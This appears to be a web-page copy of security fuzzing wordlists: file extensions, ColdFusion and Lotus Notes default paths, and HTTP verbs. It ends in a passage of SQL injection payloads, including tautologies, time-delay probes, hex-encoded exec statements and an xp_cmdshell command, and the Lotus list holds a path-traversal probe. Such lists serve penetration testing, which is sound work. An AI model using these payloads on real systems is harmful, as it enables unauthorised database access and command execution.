.wdq&lt;br /&gt;
.wea&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.wgp&lt;br /&gt;
.wgt&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wjr&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wki&lt;br /&gt;
.wks&lt;br /&gt;
.wku&lt;br /&gt;
.wlmp&lt;br /&gt;
.wmdb&lt;br /&gt;
.wor&lt;br /&gt;
.wpc&lt;br /&gt;
.wpf&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtb&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xdp&lt;br /&gt;
.xds&lt;br /&gt;
.xef&lt;br /&gt;
.xem&lt;br /&gt;
.xfd&lt;br /&gt;
.xfo&lt;br /&gt;
.xft&lt;br /&gt;
.xl&lt;br /&gt;
.xlc&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsb&lt;br /&gt;
.xlsm&lt;br /&gt;
.xlsx&lt;br /&gt;
.xlt&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xlw&lt;br /&gt;
.xmcd&lt;br /&gt;
.xml&lt;br /&gt;
.xmlper&lt;br /&gt;
.xmpz&lt;br /&gt;
.xpg&lt;br /&gt;
.xpj&lt;br /&gt;
.xpm&lt;br /&gt;
.xpt&lt;br /&gt;
.xrp&lt;br /&gt;
.xsl&lt;br /&gt;
.xslt&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.yam&lt;br /&gt;
.zap&lt;br /&gt;
.zdb&lt;br /&gt;
.zdc&lt;br /&gt;
.zix&lt;br /&gt;
.zmc&lt;br /&gt;
.zpl&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Compressed File Types - (Update: 16 March 2010 - Total Statements: 187) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Compressed File Types - (Update: 16 March 2010 - Total Statements: 187)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.0&lt;br /&gt;
.000&lt;br /&gt;
.7z&lt;br /&gt;
.a00&lt;br /&gt;
.a01&lt;br /&gt;
.a02&lt;br /&gt;
.ace&lt;br /&gt;
.ain&lt;br /&gt;
.alz&lt;br /&gt;
.apz&lt;br /&gt;
.ar&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ari&lt;br /&gt;
.arj&lt;br /&gt;
.ark&lt;br /&gt;
.axx&lt;br /&gt;
.b64&lt;br /&gt;
.ba&lt;br /&gt;
.bh&lt;br /&gt;
.boo&lt;br /&gt;
.bz&lt;br /&gt;
.bz2&lt;br /&gt;
.bzip&lt;br /&gt;
.bzip2&lt;br /&gt;
.c00&lt;br /&gt;
.c01&lt;br /&gt;
.c02&lt;br /&gt;
.car&lt;br /&gt;
.cb7&lt;br /&gt;
.cbr&lt;br /&gt;
.cbt&lt;br /&gt;
.cbz&lt;br /&gt;
.cp9&lt;br /&gt;
.cpgz&lt;br /&gt;
.cpt&lt;br /&gt;
.dar&lt;br /&gt;
.dd&lt;br /&gt;
.deb&lt;br /&gt;
.dgc&lt;br /&gt;
.dist&lt;br /&gt;
.ecs&lt;br /&gt;
.efw&lt;br /&gt;
.epi&lt;br /&gt;
.f&lt;br /&gt;
.fdp&lt;br /&gt;
.gca&lt;br /&gt;
.gz&lt;br /&gt;
.gzi&lt;br /&gt;
.gzip&lt;br /&gt;
.ha&lt;br /&gt;
.hbc&lt;br /&gt;
.hbc2&lt;br /&gt;
.hbe&lt;br /&gt;
.hki&lt;br /&gt;
.hki1&lt;br /&gt;
.hki2&lt;br /&gt;
.hki3&lt;br /&gt;
.hpk&lt;br /&gt;
.hyp&lt;br /&gt;
.ice&lt;br /&gt;
.ipg&lt;br /&gt;
.ipk&lt;br /&gt;
.ish&lt;br /&gt;
.j&lt;br /&gt;
.jar.pack&lt;br /&gt;
.jgz&lt;br /&gt;
.jic&lt;br /&gt;
.kgb&lt;br /&gt;
.lbr&lt;br /&gt;
.lemon&lt;br /&gt;
.lha&lt;br /&gt;
.lnx&lt;br /&gt;
.lqr&lt;br /&gt;
.lz&lt;br /&gt;
.lzh&lt;br /&gt;
.lzm&lt;br /&gt;
.lzma&lt;br /&gt;
.lzo&lt;br /&gt;
.lzx&lt;br /&gt;
.md&lt;br /&gt;
.mint&lt;br /&gt;
.mou&lt;br /&gt;
.mpkg&lt;br /&gt;
.mzp&lt;br /&gt;
.oar&lt;br /&gt;
.p7m&lt;br /&gt;
.pack.gz&lt;br /&gt;
.package&lt;br /&gt;
.pae&lt;br /&gt;
.pak&lt;br /&gt;
.paq6&lt;br /&gt;
.paq7&lt;br /&gt;
.paq8&lt;br /&gt;
.par&lt;br /&gt;
.par2&lt;br /&gt;
.pbi&lt;br /&gt;
.pcv&lt;br /&gt;
.pea&lt;br /&gt;
.pet&lt;br /&gt;
.pf&lt;br /&gt;
.pim&lt;br /&gt;
.pit&lt;br /&gt;
.piz&lt;br /&gt;
.pkg&lt;br /&gt;
.pup&lt;br /&gt;
.puz&lt;br /&gt;
.pwa&lt;br /&gt;
.qda&lt;br /&gt;
.r0&lt;br /&gt;
.r00&lt;br /&gt;
.r01&lt;br /&gt;
.r02&lt;br /&gt;
.r03&lt;br /&gt;
.r1&lt;br /&gt;
.r2&lt;br /&gt;
.r30&lt;br /&gt;
.rar&lt;br /&gt;
.rev&lt;br /&gt;
.rk&lt;br /&gt;
.rnc&lt;br /&gt;
.rp9&lt;br /&gt;
.rpm&lt;br /&gt;
.rte&lt;br /&gt;
.rz&lt;br /&gt;
.rzs&lt;br /&gt;
.s00&lt;br /&gt;
.s01&lt;br /&gt;
.s02&lt;br /&gt;
.s7z&lt;br /&gt;
.sar&lt;br /&gt;
.sdc&lt;br /&gt;
.sdn&lt;br /&gt;
.sea&lt;br /&gt;
.sen&lt;br /&gt;
.sfs&lt;br /&gt;
.sfx&lt;br /&gt;
.sh&lt;br /&gt;
.shar&lt;br /&gt;
.shk&lt;br /&gt;
.shr&lt;br /&gt;
.sit&lt;br /&gt;
.sitx&lt;br /&gt;
.spt&lt;br /&gt;
.sqx&lt;br /&gt;
.sqz&lt;br /&gt;
.tar&lt;br /&gt;
.tar.gz&lt;br /&gt;
.tar.xz&lt;br /&gt;
.taz&lt;br /&gt;
.tbz&lt;br /&gt;
.tbz2&lt;br /&gt;
.tg&lt;br /&gt;
.tgz&lt;br /&gt;
.tlz&lt;br /&gt;
.tlzma&lt;br /&gt;
.txz&lt;br /&gt;
.tz&lt;br /&gt;
.uc2&lt;br /&gt;
.uha&lt;br /&gt;
.vem&lt;br /&gt;
.vsi&lt;br /&gt;
.wad&lt;br /&gt;
.war&lt;br /&gt;
.wot&lt;br /&gt;
.xef&lt;br /&gt;
.xez&lt;br /&gt;
.xmcdz&lt;br /&gt;
.xpi&lt;br /&gt;
.xx&lt;br /&gt;
.xz&lt;br /&gt;
.y&lt;br /&gt;
.yz&lt;br /&gt;
.z&lt;br /&gt;
.z01&lt;br /&gt;
.z02&lt;br /&gt;
.z03&lt;br /&gt;
.z04&lt;br /&gt;
.zap&lt;br /&gt;
.zfsendtotarget&lt;br /&gt;
.zip&lt;br /&gt;
.zipx&lt;br /&gt;
.zix&lt;br /&gt;
.zoo&lt;br /&gt;
.zpi&lt;br /&gt;
.zz&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
# Uncommon Data File Extensions  (Update: 16 March 2010 - Total Statements: 284)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
.3me&lt;br /&gt;
.3pe&lt;br /&gt;
.4dl&lt;br /&gt;
.8xk&lt;br /&gt;
.^^^&lt;br /&gt;
.aao&lt;br /&gt;
.ab2&lt;br /&gt;
.aca&lt;br /&gt;
.accdb&lt;br /&gt;
.acf&lt;br /&gt;
.acg&lt;br /&gt;
.agd&lt;br /&gt;
.an1&lt;br /&gt;
.anme&lt;br /&gt;
.arc&lt;br /&gt;
.arh&lt;br /&gt;
.ast&lt;br /&gt;
.att&lt;br /&gt;
.aw&lt;br /&gt;
.bafl&lt;br /&gt;
.bdf&lt;br /&gt;
.bfx&lt;br /&gt;
.bjo&lt;br /&gt;
.bld&lt;br /&gt;
.blg&lt;br /&gt;
.btf&lt;br /&gt;
.btif&lt;br /&gt;
.btr&lt;br /&gt;
.cct&lt;br /&gt;
.cdb&lt;br /&gt;
.cdd&lt;br /&gt;
.cdf&lt;br /&gt;
.cdp&lt;br /&gt;
.cdr&lt;br /&gt;
.chk&lt;br /&gt;
.ckd&lt;br /&gt;
.cl2&lt;br /&gt;
.cl4&lt;br /&gt;
.clb&lt;br /&gt;
.clix&lt;br /&gt;
.clm&lt;br /&gt;
.cmbl&lt;br /&gt;
.contact&lt;br /&gt;
.cpi&lt;br /&gt;
.cpmz&lt;br /&gt;
.csv&lt;br /&gt;
.cwz&lt;br /&gt;
.cxt&lt;br /&gt;
.daf&lt;br /&gt;
.dat&lt;br /&gt;
.data&lt;br /&gt;
.db&lt;br /&gt;
.dcf&lt;br /&gt;
.ddt&lt;br /&gt;
.dex&lt;br /&gt;
.dif&lt;br /&gt;
.dmsk&lt;br /&gt;
.dnc&lt;br /&gt;
.dpx&lt;br /&gt;
.dsd&lt;br /&gt;
.dt1&lt;br /&gt;
.dt2&lt;br /&gt;
.dta&lt;br /&gt;
.e00&lt;br /&gt;
.ec0&lt;br /&gt;
.edf&lt;br /&gt;
.eep&lt;br /&gt;
.efx&lt;br /&gt;
.enc&lt;br /&gt;
.enw&lt;br /&gt;
.epw&lt;br /&gt;
.est&lt;br /&gt;
.et&lt;br /&gt;
.eta&lt;br /&gt;
.ev3&lt;br /&gt;
.exif&lt;br /&gt;
.exp&lt;br /&gt;
.fbl&lt;br /&gt;
.fdb&lt;br /&gt;
.fid&lt;br /&gt;
.fol&lt;br /&gt;
.gdb&lt;br /&gt;
.gen&lt;br /&gt;
.gnp&lt;br /&gt;
.gpi&lt;br /&gt;
.gpx&lt;br /&gt;
.hcp&lt;br /&gt;
.hdf&lt;br /&gt;
.hmt&lt;br /&gt;
.hsk&lt;br /&gt;
.htg&lt;br /&gt;
.id2&lt;br /&gt;
.ii&lt;br /&gt;
.img&lt;br /&gt;
.ink&lt;br /&gt;
.ins&lt;br /&gt;
.irr&lt;br /&gt;
.irx&lt;br /&gt;
.iw&lt;br /&gt;
.jdb&lt;br /&gt;
.jnt&lt;br /&gt;
.job&lt;br /&gt;
.jrprint&lt;br /&gt;
.kmz&lt;br /&gt;
.lbx&lt;br /&gt;
.lex&lt;br /&gt;
.lgf&lt;br /&gt;
.lgl&lt;br /&gt;
.lib&lt;br /&gt;
.liveupdate&lt;br /&gt;
.lnt&lt;br /&gt;
.lst&lt;br /&gt;
.m&lt;br /&gt;
.masseffectprofile&lt;br /&gt;
.mat&lt;br /&gt;
.mbb&lt;br /&gt;
.mdb&lt;br /&gt;
.mem&lt;br /&gt;
.menc&lt;br /&gt;
.met&lt;br /&gt;
.mmf&lt;br /&gt;
.mng&lt;br /&gt;
.mpd&lt;br /&gt;
.mpp&lt;br /&gt;
.ms10&lt;br /&gt;
.muf&lt;br /&gt;
.mw&lt;br /&gt;
.mwf&lt;br /&gt;
.mwx&lt;br /&gt;
.nc&lt;br /&gt;
.ndx&lt;br /&gt;
.nfo&lt;br /&gt;
.not&lt;br /&gt;
.ns2&lt;br /&gt;
.ns3&lt;br /&gt;
.ns4&lt;br /&gt;
.ntx&lt;br /&gt;
.numbers&lt;br /&gt;
.ods&lt;br /&gt;
.oeaccount&lt;br /&gt;
.omcs&lt;br /&gt;
.or2&lt;br /&gt;
.or3&lt;br /&gt;
.or4&lt;br /&gt;
.or5&lt;br /&gt;
.orx&lt;br /&gt;
.out&lt;br /&gt;
.ov2&lt;br /&gt;
.ovf&lt;br /&gt;
.paf&lt;br /&gt;
.pbd&lt;br /&gt;
.pcr&lt;br /&gt;
.pdb&lt;br /&gt;
.pdx&lt;br /&gt;
.peb&lt;br /&gt;
.pec&lt;br /&gt;
.pfc&lt;br /&gt;
.pis&lt;br /&gt;
.pln&lt;br /&gt;
.pnpt&lt;br /&gt;
.pns&lt;br /&gt;
.pnt&lt;br /&gt;
.pos&lt;br /&gt;
.postal&lt;br /&gt;
.pps&lt;br /&gt;
.ppsx&lt;br /&gt;
.ppt&lt;br /&gt;
.pptm&lt;br /&gt;
.pptx&lt;br /&gt;
.pre&lt;br /&gt;
.prf&lt;br /&gt;
.psa&lt;br /&gt;
.psf&lt;br /&gt;
.pst&lt;br /&gt;
.ptz&lt;br /&gt;
.q07&lt;br /&gt;
.q3d&lt;br /&gt;
.qbw&lt;br /&gt;
.qdat&lt;br /&gt;
.qdf&lt;br /&gt;
.qfx&lt;br /&gt;
.qpf&lt;br /&gt;
.qpw&lt;br /&gt;
.qsd&lt;br /&gt;
.rcd&lt;br /&gt;
.rdx&lt;br /&gt;
.ref&lt;br /&gt;
.rmuf&lt;br /&gt;
.roi&lt;br /&gt;
.rrt&lt;br /&gt;
.rvt&lt;br /&gt;
.rwg&lt;br /&gt;
.saf&lt;br /&gt;
.sam07&lt;br /&gt;
.sbd&lt;br /&gt;
.sbf&lt;br /&gt;
.sbq&lt;br /&gt;
.sbt&lt;br /&gt;
.sdb&lt;br /&gt;
.sdc&lt;br /&gt;
.sdf&lt;br /&gt;
.sds&lt;br /&gt;
.ser&lt;br /&gt;
.sgn&lt;br /&gt;
.shs&lt;br /&gt;
.skc&lt;br /&gt;
.slk&lt;br /&gt;
.sonic&lt;br /&gt;
.soundpack&lt;br /&gt;
.spo&lt;br /&gt;
.sql&lt;br /&gt;
.stf&lt;br /&gt;
.stl&lt;br /&gt;
.stm&lt;br /&gt;
.sy3&lt;br /&gt;
.t08&lt;br /&gt;
.t09&lt;br /&gt;
.t2&lt;br /&gt;
.tax2009&lt;br /&gt;
.tdl&lt;br /&gt;
.tdt&lt;br /&gt;
.te&lt;br /&gt;
.teacher&lt;br /&gt;
.tmw&lt;br /&gt;
.tol&lt;br /&gt;
.trk&lt;br /&gt;
.trs&lt;br /&gt;
.trx&lt;br /&gt;
.tsv&lt;br /&gt;
.uccapilog&lt;br /&gt;
.ud&lt;br /&gt;
.udeb&lt;br /&gt;
.uds&lt;br /&gt;
.update&lt;br /&gt;
.uwl&lt;br /&gt;
.val&lt;br /&gt;
.vcf&lt;br /&gt;
.vdb&lt;br /&gt;
.vfs&lt;br /&gt;
.vip&lt;br /&gt;
.vle&lt;br /&gt;
.vlg&lt;br /&gt;
.vxml&lt;br /&gt;
.w02&lt;br /&gt;
.wab&lt;br /&gt;
.wb1&lt;br /&gt;
.wb3&lt;br /&gt;
.wdq&lt;br /&gt;
.wfd&lt;br /&gt;
.wfm&lt;br /&gt;
.windowslivecontact&lt;br /&gt;
.wk1&lt;br /&gt;
.wk2&lt;br /&gt;
.wk3&lt;br /&gt;
.wk4&lt;br /&gt;
.wk5&lt;br /&gt;
.wke&lt;br /&gt;
.wks&lt;br /&gt;
.wlmp&lt;br /&gt;
.wpc&lt;br /&gt;
.wpo&lt;br /&gt;
.wq1&lt;br /&gt;
.wq2&lt;br /&gt;
.wtr&lt;br /&gt;
.xbk&lt;br /&gt;
.xdb&lt;br /&gt;
.xds&lt;br /&gt;
.xfd&lt;br /&gt;
.xl&lt;br /&gt;
.xlgc&lt;br /&gt;
.xlr&lt;br /&gt;
.xls&lt;br /&gt;
.xlsx&lt;br /&gt;
.xltm&lt;br /&gt;
.xltx&lt;br /&gt;
.xml&lt;br /&gt;
.xmpz&lt;br /&gt;
.xsl&lt;br /&gt;
.xsn&lt;br /&gt;
.xtm&lt;br /&gt;
.xtp&lt;br /&gt;
.xxd&lt;br /&gt;
.{pb&lt;br /&gt;
.~hm&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
CFIDE/Administrator/&lt;br /&gt;
CFIDE/Administrator/index.cfm&lt;br /&gt;
CFIDE/Administrator/login.cfm&lt;br /&gt;
CFIDE/Administrator/Application.cfm&lt;br /&gt;
CFIDE/Application.cfm&lt;br /&gt;
CFIDE/adminapi/&lt;br /&gt;
CFIDE/adminapi/Application.cfm&lt;br /&gt;
CFIDE/adminapi/administrator.cfc&lt;br /&gt;
CFIDE/adminapi/base.cfc&lt;br /&gt;
CFIDE/adminapi/customtags/&lt;br /&gt;
CFIDE/adminapi/customtags/l10n.cfm&lt;br /&gt;
CFIDE/adminapi/customtags/resources&lt;br /&gt;
CFIDE/adminapi/customtags/resources/&lt;br /&gt;
CFIDE/adminapi/datasource.cfc&lt;br /&gt;
CFIDE/adminapi/debugging.cfc&lt;br /&gt;
CFIDE/adminapi/eventgateway.cfc&lt;br /&gt;
CFIDE/adminapi/extensions.cfc&lt;br /&gt;
CFIDE/adminapi/mail.cfc&lt;br /&gt;
CFIDE/adminapi/runtime.cfc&lt;br /&gt;
CFIDE/adminapi/security.cfc&lt;br /&gt;
CFIDE/adminapi/_datasource/&lt;br /&gt;
CFIDE/adminapi/_datasource/formatjdbcurl.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/geturldefaults.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setdsn.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm&lt;br /&gt;
CFIDE/adminapi/_datasource/setsldatasource.cfm&lt;br /&gt;
CFIDE/classes/&lt;br /&gt;
CFIDE/classes/cf-j2re-win.cab&lt;br /&gt;
CFIDE/classes/cfapplets.jar&lt;br /&gt;
CFIDE/classes/images&lt;br /&gt;
CFIDE/componentutils/&lt;br /&gt;
CFIDE/componentutils/Application.cfm&lt;br /&gt;
CFIDE/componentutils/cfcexplorer.cfc&lt;br /&gt;
CFIDE/componentutils/cfcexplorer_utils.cfm&lt;br /&gt;
CFIDE/componentutils/componentdetail.cfm&lt;br /&gt;
CFIDE/componentutils/componentdoc.cfm&lt;br /&gt;
CFIDE/componentutils/componentlist.cfm&lt;br /&gt;
CFIDE/componentutils/gatewaymenu&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menu.cfc&lt;br /&gt;
CFIDE/componentutils/gatewaymenu/menunode.cfc&lt;br /&gt;
CFIDE/componentutils/login.cfm&lt;br /&gt;
CFIDE/componentutils/packagelist.cfm&lt;br /&gt;
CFIDE/componentutils/utils.cfc&lt;br /&gt;
CFIDE/componentutils/_component_cfcToHTML.cfm&lt;br /&gt;
CFIDE/componentutils/_component_cfcToMCDL.cfm?&lt;br /&gt;
CFIDE/componentutils/_component_style.cfm&lt;br /&gt;
CFIDE/componentutils/_component_utils.cfm&lt;br /&gt;
CFIDE/debug/&lt;br /&gt;
CFIDE/debug/images/&lt;br /&gt;
CFIDE/debug/includes/&lt;br /&gt;
CFIDE/images/&lt;br /&gt;
CFIDE/images/skins/&lt;br /&gt;
CFIDE/install.cfm&lt;br /&gt;
CFIDE/installers/&lt;br /&gt;
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp&lt;br /&gt;
CFIDE/installers/CFReportBuilderInstaller.exe&lt;br /&gt;
CFIDE/probe.cfm&lt;br /&gt;
CFIDE/scripts/&lt;br /&gt;
CFIDE/scripts/css/&lt;br /&gt;
CFIDE/scripts/xsl/&lt;br /&gt;
CFIDE/wizards/&lt;br /&gt;
CFIDE/wizards/common/&lt;br /&gt;
CFIDE/wizards/common/utils.cfc&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#  ll HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)&lt;br /&gt;
# adam.muntner@quietmove.com&lt;br /&gt;
# creative commons&lt;br /&gt;
&lt;br /&gt;
OPTIONS&lt;br /&gt;
GET&lt;br /&gt;
HEAD&lt;br /&gt;
POST&lt;br /&gt;
PUT&lt;br /&gt;
DELETE&lt;br /&gt;
TRACE&lt;br /&gt;
CONNECT&lt;br /&gt;
PROPFIND&lt;br /&gt;
PROPPATCH&lt;br /&gt;
MKCOL&lt;br /&gt;
COPY&lt;br /&gt;
MOVE&lt;br /&gt;
LOCK&lt;br /&gt;
UNLOCK&lt;br /&gt;
VERSION-CONTROL&lt;br /&gt;
REPORT&lt;br /&gt;
CHECKOUT&lt;br /&gt;
CHECKIN&lt;br /&gt;
UNCHECKOUT&lt;br /&gt;
MKWORKSPACE&lt;br /&gt;
UPDATE&lt;br /&gt;
LABEL&lt;br /&gt;
MERGE&lt;br /&gt;
BASELINE-CONTROL&lt;br /&gt;
MKACTIVITY&lt;br /&gt;
ORDERPATCH&lt;br /&gt;
ACL&lt;br /&gt;
PATCH&lt;br /&gt;
SEARCH&lt;br /&gt;
ARBITRARY&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;/852566C90012664F&lt;br /&gt;
/admin4.nsf&lt;br /&gt;
/admin5.nsf&lt;br /&gt;
/admin.nsf&lt;br /&gt;
/agentrunner.nsf&lt;br /&gt;
/alog.nsf&lt;br /&gt;
/a_domlog.nsf&lt;br /&gt;
/bookmark.nsf&lt;br /&gt;
/busytime.nsf&lt;br /&gt;
/catalog.nsf&lt;br /&gt;
/certa.nsf&lt;br /&gt;
/certlog.nsf&lt;br /&gt;
/certsrv.nsf&lt;br /&gt;
/chatlog.nsf&lt;br /&gt;
/clbusy.nsf&lt;br /&gt;
/cldbdir.nsf&lt;br /&gt;
/clusta4.nsf&lt;br /&gt;
/collect4.nsf&lt;br /&gt;
/da.nsf&lt;br /&gt;
/dba4.nsf&lt;br /&gt;
/dclf.nsf&lt;br /&gt;
/DEASAppDesign.nsf&lt;br /&gt;
/DEASLog01.nsf&lt;br /&gt;
/DEASLog02.nsf&lt;br /&gt;
/DEASLog03.nsf&lt;br /&gt;
/DEASLog04.nsf&lt;br /&gt;
/DEASLog05.nsf&lt;br /&gt;
/DEASLog.nsf&lt;br /&gt;
/decsadm.nsf&lt;br /&gt;
/decslog.nsf&lt;br /&gt;
/DEESAdmin.nsf&lt;br /&gt;
/dirassist.nsf&lt;br /&gt;
/doladmin.nsf&lt;br /&gt;
/domadmin.nsf&lt;br /&gt;
/domcfg.nsf&lt;br /&gt;
/domguide.nsf&lt;br /&gt;
/domlog.nsf&lt;br /&gt;
/dspug.nsf&lt;br /&gt;
/events4.nsf&lt;br /&gt;
/events5.nsf&lt;br /&gt;
/events.nsf&lt;br /&gt;
/event.nsf&lt;br /&gt;
/homepage.nsf&lt;br /&gt;
/iNotes/Forms5.nsf/$DefaultNav&lt;br /&gt;
/jotter.nsf&lt;br /&gt;
/leiadm.nsf&lt;br /&gt;
/leilog.nsf&lt;br /&gt;
/leivlt.nsf&lt;br /&gt;
/log4a.nsf&lt;br /&gt;
/log.nsf&lt;br /&gt;
/l_domlog.nsf&lt;br /&gt;
/mab.nsf&lt;br /&gt;
/mail10.box&lt;br /&gt;
/mail1.box&lt;br /&gt;
/mail2.box&lt;br /&gt;
/mail3.box&lt;br /&gt;
/mail4.box&lt;br /&gt;
/mail5.box&lt;br /&gt;
/mail6.box&lt;br /&gt;
/mail7.box&lt;br /&gt;
/mail8.box&lt;br /&gt;
/mail9.box&lt;br /&gt;
/mail.box&lt;br /&gt;
/msdwda.nsf&lt;br /&gt;
/mtatbls.nsf&lt;br /&gt;
/mtstore.nsf&lt;br /&gt;
/names.nsf&lt;br /&gt;
/nntppost.nsf&lt;br /&gt;
/nntp/nd000001.nsf&lt;br /&gt;
/nntp/nd000002.nsf&lt;br /&gt;
/nntp/nd000003.nsf&lt;br /&gt;
/ntsync45.nsf&lt;br /&gt;
/perweb.nsf&lt;br /&gt;
/qpadmin.nsf&lt;br /&gt;
/quickplace/quickplace/main.nsf&lt;br /&gt;
/reports.nsf&lt;br /&gt;
/sample/siregw46.nsf&lt;br /&gt;
/schema50.nsf&lt;br /&gt;
/setupweb.nsf&lt;br /&gt;
/setup.nsf&lt;br /&gt;
/smbcfg.nsf&lt;br /&gt;
/smconf.nsf&lt;br /&gt;
/smency.nsf&lt;br /&gt;
/smhelp.nsf&lt;br /&gt;
/smmsg.nsf&lt;br /&gt;
/smquar.nsf&lt;br /&gt;
/smsolar.nsf&lt;br /&gt;
/smtime.nsf&lt;br /&gt;
/smtpibwq.nsf&lt;br /&gt;
/smtpobwq.nsf&lt;br /&gt;
/smtp.box&lt;br /&gt;
/smtp.nsf&lt;br /&gt;
/smvlog.nsf&lt;br /&gt;
/srvnam.htm&lt;br /&gt;
/statmail.nsf&lt;br /&gt;
/statrep.nsf&lt;br /&gt;
/stauths.nsf&lt;br /&gt;
/stautht.nsf&lt;br /&gt;
/stconfig.nsf&lt;br /&gt;
/stconf.nsf&lt;br /&gt;
/stdnaset.nsf&lt;br /&gt;
/stdomino.nsf&lt;br /&gt;
/stlog.nsf&lt;br /&gt;
/streg.nsf&lt;br /&gt;
/stsrc.nsf&lt;br /&gt;
/userreg.nsf&lt;br /&gt;
/vpuserinfo.nsf&lt;br /&gt;
/webadmin.nsf&lt;br /&gt;
/web.nsf&lt;br /&gt;
/.nsf/../winnt/win.ini&lt;br /&gt;
/?Open &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126)  ===&lt;br /&gt;
&amp;lt;pre&amp;gt;Statement&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
&amp;quot;a&amp;quot;&amp;quot; or 1=1--&amp;quot;&lt;br /&gt;
 or a = a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
'&lt;br /&gt;
'%20or%20''='&lt;br /&gt;
'%20or%20'x'='x&lt;br /&gt;
%20or%20x=x&lt;br /&gt;
')%20or%20('x'='x&lt;br /&gt;
0 or 1=1&lt;br /&gt;
' or 0=0 --&lt;br /&gt;
&amp;quot; or 0=0 --&lt;br /&gt;
or 0=0 --&lt;br /&gt;
' or 0=0 #&lt;br /&gt;
 or 0=0 #&amp;quot;&lt;br /&gt;
or 0=0 #&lt;br /&gt;
' or 1=1--&lt;br /&gt;
&amp;quot; or 1=1--&lt;br /&gt;
' or '1'='1'--&lt;br /&gt;
' or 1 --'&lt;br /&gt;
or 1=1--&lt;br /&gt;
or%201=1&lt;br /&gt;
or%201=1 --&lt;br /&gt;
' or 1=1 or ''='&lt;br /&gt;
 or 1=1 or &amp;quot;&amp;quot;=&lt;br /&gt;
' or a=a--&lt;br /&gt;
 or a=a&lt;br /&gt;
') or ('a'='a&lt;br /&gt;
) or (a=a&lt;br /&gt;
hi or a=a&lt;br /&gt;
hi or 1=1 --&amp;quot;&lt;br /&gt;
hi' or 1=1 --&lt;br /&gt;
hi' or 'a'='a&lt;br /&gt;
hi') or ('a'='a&lt;br /&gt;
